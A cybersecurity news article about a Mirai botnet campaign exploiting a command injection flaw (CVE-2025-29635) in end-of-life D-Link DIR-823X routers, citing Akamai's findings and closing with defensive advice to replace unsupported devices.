A new malware campaign powered by the infamous Mirai malware is actively targeting outdated routers by exploiting a critical vulnerability in D-Link devices. Specifically, attackers are leveraging CVE-2025-29635, a high-severity command injection flaw affecting D-Link DIR-823X routers, to compromise devices and recruit them into a growing botnet.

To begin with, this vulnerability enables threat actors to execute arbitrary commands remotely. By sending a crafted POST request to a vulnerable endpoint, attackers can trigger remote command execution (RCE), thereby gaining control over affected devices. As a result, compromised routers become part of a larger malicious network used for coordinated cyberattacks.

According to Akamai SIRT, which identified the campaign in March 2026, this marks the first confirmed instance of active exploitation in real-world environments. Although researchers Wang Jinshuai and Zhao Jiangting initially disclosed the flaw over a year ago, attackers have only recently begun exploiting it at scale.

“The Akamai SIRT discovered active exploitation attempts of the D-Link command injection vulnerability CVE-2025-29635 in our global network of honeypots in early March 2026,” reads Akamai’s report.

“This vulnerability exists in D-Link DIR-823X series routers in firmware versions 240126 and 24082, and allows an authorized attacker to execute arbitrary commands on remote devices by sending a POST request to the /goform/set_prohibiting endpoint via the corresponding function, which can trigger remote command execution.”

Furthermore, researchers noted that attackers deploy a consistent attack pattern. They send malicious POST requests to navigate writable directories, download a shell script named dlink.sh from an external source, and execute it to install the Mirai payload. Consequently, infected devices become part of a botnet infrastructure.

In addition, the same threat actor appears to exploit other known vulnerabilities, including CVE-2023-1389 affecting TP-Link routers and another RCE flaw targeting ZTE ZXV10 H108L devices. This broader targeting strategy highlights the campaign’s scalability and sophistication.

However, a major concern arises from the fact that the impacted D-Link routers reached end-of-life (EoL) status in November 2024. Since these devices no longer receive security updates, it is unlikely that a patch for CVE-2025-29635 will be released. Notably, D-Link typically does not provide fixes for discontinued products, even when active exploitation is detected.

Meanwhile, BleepingComputer has contacted D-Link for clarification regarding the issue and potential mitigation steps. Updates are expected once the company responds.

Given the situation, security experts strongly recommend that users replace unsupported routers with newer models that receive regular updates. Additionally, users should disable remote administration features when unnecessary, change default credentials, and closely monitor device configurations for suspicious changes. Taking these proactive steps can significantly reduce exposure to ongoing cyber threats.

Recommended Cyber Technology News:

To participate in our interviews, please write to our CyberTech Media Room at info@intentamplify.com